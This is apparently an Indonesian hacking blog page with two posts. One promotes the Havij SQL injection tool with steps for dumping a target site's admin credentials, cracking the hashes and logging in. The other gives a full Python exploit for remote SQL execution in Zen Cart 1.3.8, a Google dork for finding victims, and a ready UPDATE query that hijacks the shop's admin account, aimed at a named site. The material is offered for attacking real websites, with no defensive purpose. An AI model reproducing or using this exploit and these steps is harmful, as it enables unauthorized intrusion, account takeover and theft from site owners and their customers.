Havij 1.06 – Advanced SQL Injection Tool

1 Komentar

Havij 1.06 - Advanced SQL Injection Tool

Havij
—–
Version 1.06
Copyright © 2009
By r3dm0v3
http://r3dm0v3.persianblog.ir
r3dm0v3[4t]yahoo[.]com
Please tell me your offers and report bugs.
Check for updates!

Licence
——-
This program is free software. I hope it be useful for you.
This software is provided “as is” without warranties.
Feel free to share and distribute it anywhere but please keep the files original!

What’s New?
———–
-Oracle database
-MsAccess database
-Find Admin
-Proxy support
-Filtering enabled
-update/delete/insert
-Group_concat for mysql
-New look
-User agent header
-Load cookie from page
-Analyze method made better (specially for mysql)
-Many bugs fixed.

Features
——–
Data Bases: MsSQL 2000/2005 with error, MsSQL 2000/2005 no error, MySQL, Oracle, MsAccess
Find admin page
Getting Information
Getting Tables, Columns, Data
Command Executation (mssql only)
Reading Files (mysql only)
insert/update/delete data
Proxy support
Guessing tables and columns in mysql<5
Fast getting tables and columns for mysql.
Checking different injection syntaxes.
Changing http headers
Bypass illegal union.
Avoid using strings.

Cara Pakai :

1. Masukkan situs target ke kolom target, kemudian klik ” Analyze ”
2. Tunggu hingga proses scanning selesai, di situ akan kelihatan IP, Web Server, DB type dll….
3. Setelah itu, bila beruntung anda akan mendapatkan hole dari site tersebut, untuk bisa di inject.
4. Pada tab ” Tables “, klik ” Get Tables “, tunggu lagi hingga proses selesai, nanti akan kelura nama2 table dari database tersebut,…
5. Jika sudah selesai, ceklis Tables yang berhubungan dengan ADMIN, contoh ” Users “, ” Account “, ” Admin “, dll…sesuaikan sendiri.
5. Setelah itu, klik ” Get Columns “, tunggu hingga proses selesai, nanti akan muncul columns yanga ada pada Tables tadi, contoh ” password “, ” username “, ” user_id”, dll, sesuaikan sendiri..
6. Tahap yang penting adalah mendapatkan data pada columns tadi, ceklis salah satu columns, kemudian klik ” Get Data” , tunggu prosesnya, nanti akan terlihat data-data berupa userid, password ( biasanya MD5 )..dll
7. Setelah selesai mendapatkan Data, misal password benrbentuk MD5, klik tab MD5 ( v1.08) untuk crackingnya.
8. Langkah terakhir klik tab ” Find Admin “, untuk mencari admin page dari site target anda..jika proses berhasil akan keluar URL yang menuju ke Admin Pagenya, kemudian Go to URL,…
9. Jika Admin Page sudah terbuka, tinggal masukkan user Adminnya beserta Password yang didapat tadi,…login, dan semoga berhasil,…..

Download Link :

http://www.4shared.com/file/258231797/79214c44/Havij_108.html

Iklan

Bugs Zen Cart

15 Komentar

assalamualaikum

Langsung Aja Dibaca

buka google ketik : powered by zen cart ™

kalo udah nih ada pithon :

#!/usr/bin/python

#
# ------- Zen Cart 1.3.8 Remote SQL Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH :)
#

#
# Notes: must have admin/sqlpatch.php enabled
#
# clean the database :
#   DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1);
#   DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php';

import urllib, urllib2, re, sys

a,b = sys.argv,0

def option(name, need = 0):
   global a, b
   for param in sys.argv:
      if(param == '-'+name): return str(sys.argv[b+1])
      b = b + 1
   if(need):
      print '\n#error', "-"+name, 'parameter required'
      exit(1)

if (len(sys.argv) < 2):
   print """
=____________ Zen Cart 1.3.8 Remote SQL Execution Exploit  ____________=
========================================================================
|                  BlackH <Bl4ck.H@gmail.com>                          |
========================================================================
|                                                                      |
| $system> python """+sys.argv[0]+""" -url <url>                                |
| Param: <url>      ex: http://victim.com/site (no slash)              |
|                                                                      |
| Note: blind "injection"                                              |
========================================================================
   """
   exit(1)

url, trick = option('url', 1), "/password_forgotten.php"

while True:
   cmd = raw_input('sql@jah$ ')
   if (cmd == "exit"): exit(1)
   req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd}))
   if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
      print '>> success (', cmd, ")"
   else:
      print '>> failed, be sure to end with ; (', cmd, ")"

tuh pithon save dgn extensi zen.py

sebelum nya komputer kamu instal dlu pithon nya , kalo blum aja download aja di : http://www.python.org/ftp/python/2.5/python-2.5.msi

kalo udah buka cmd
misal zen.py kamu taruh di desktop bearti cmd kamu arahin ke desktop dlu

kalo udah ketik : zen.py -url htttp://webkorban.com
contohh : zen.py -url http://customizthat.com/2010/admin/ <–enter
trus nanti ada tulisan $sql@jah
aklo ada tulisan itu bearti masukin perintah : UPDATE admin SET admin_name=’adminz’, admin_email=’admin@shopadmin.com’, admin_pass=’617ec22fbb8f201c366e9848c0eb6925:87′ WHERE admin_id=’1′; trus enter

kalo berhasil maka akan muncul kayak ini :

>> success ( UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.
com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; )
sql@jah$

contoh nya nih ss nya

Bugs Zen Cart

Bugs Zen Cart

kalo udah succes, tinggal di url target ditambahin /admin/

kalo succes setiap username sama pasword nya itu adminz : wew

sekian dan terima kasih

Kalo berhasil ada tulisan ini

>> success ( UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.
com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; )
sql@jah$

Kalo gagal ada tulisan gini

>> failed, be sure to end with ; ( UPDATE admin SET admin_name='adminz', admin_e
mail='admin@shopadmin.com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHE
RE admin_id='1';

Atau ini

Traceback (most recent call last):
 File "C:\Documents and Settings\Toshiba\Desktop\zen.py", line 53, in
 if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
 File "C:\Python25\lib\urllib2.py", line 121, in urlopen
 return _opener.open(url, data)
 File "C:\Python25\lib\urllib2.py", line 374, in open
 response = self._open(req, data)
 File "C:\Python25\lib\urllib2.py", line 392, in _open
 '_open', req)
 File "C:\Python25\lib\urllib2.py", line 353, in _call_chain
 result = func(*args)
 File "C:\Python25\lib\urllib2.py", line 1101, in http_open
 return self.do_open(httplib.HTTPConnection, req)
 File "C:\Python25\lib\urllib2.py", line 1076, in do_open
 raise URLError(err)
urllib2.URLError: 

By : Ichito Bandito